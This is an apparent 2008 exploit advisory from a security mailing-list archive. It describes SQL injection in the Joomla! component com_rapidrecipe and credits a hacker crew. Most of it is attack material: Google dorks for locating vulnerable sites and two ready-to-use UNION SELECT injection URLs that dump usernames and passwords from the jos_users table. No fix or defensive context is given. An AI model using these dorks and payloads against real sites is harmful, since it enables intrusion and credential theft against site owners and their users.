Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

joomla (k12. tr)(com_iomez un)SQL Injection

joomll(k12. tr)(com_mezun )SQL Injection

joomla (k12. tr)(com_iomez un)SQL Injection

Kommentare zum Download script SQL Injection

From:	staad1_(at)_gmail.com <staad1_(at)_gmail.com>
Date:	12.02.2008
Subject:	Default Multiple Joomla! Component com_rapidrecipe "user_id=" Remote SQL Inj.

  Multiple Joomla! Component com_rapidrecipe "user_id=" Remote SQL Injection Vulnerability


# Discovered by breaker_unit
# Dark Phyber Crew
# b4lc4n-h4ck.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

---------------------------------------------------------------------------------
-------
Google Dorks:

inurl:"/index.php?option=com_rapidrecipe
allinurl:"com_rapidrecipe"


---------------------------------------------------------------------------------
-------


/index.php?option=com_rapidrecipe&page=showuser&user_id=-
1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,
20--

/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-
1+union+all+select+concat(username,0x3a,password),
2+from+jos_users+limit+0,20--

---------------------------------------------------------------------------------
-------